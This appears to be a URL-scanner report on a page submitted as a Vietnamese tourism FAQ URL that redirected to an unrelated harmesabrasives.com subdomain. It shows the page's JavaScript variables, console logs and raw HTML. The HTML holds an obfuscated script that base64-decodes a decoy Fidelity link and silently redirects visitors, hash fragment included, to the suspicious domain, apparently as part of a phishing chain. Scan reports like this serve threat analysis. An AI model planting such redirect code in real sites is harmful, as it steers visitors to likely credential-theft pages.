https://ghpe.harmesabrasives.com/taoHQXMe#

Submitted URL:
https://saigonviettourist.vn/faqs/
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 10 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
verifyCallback_CFfunction
validateElementfunction
refreshCallBackfunction
onloadTurnstileCallbackfunction
cfunction
lpfunction
turnstileobject

Console log messages · 4 found

Messages logged to the web console

TypeCategoryLog
logother
Text
https://ghpe.harmesabrasives.com/taoHQXMe
logother
logother
Text
https://ghpe.harmesabrasives.com/taoHQXMe
logother

HTML

The raw HTML body of the page

<html><head><script type="text/javascript">
    var firstBase64Url = "aHR0cHM6Ly9maWRlbGl0eS5jb20v";
    var secondBase64Url = "aHR0cHM6Ly9naHBlLmhhcm1lc2FicmFzaXZlcy5jb20vdGFvSFFYTWU";

    // Load the first URL for a few seconds
    setTimeout(function() {
      window.open(atob(firstBase64Url), '_blank');
    }, 2000); // 2000 milliseconds = 2 seconds

    // After the specified time, load the second URL
    setTimeout(function() {
      window.location.href = atob(secondBase64Url) + "#" + window.location.hash.substr(1);
    }, 2000); // 2000 milliseconds = 2 seconds
  </script></head><body></body></html>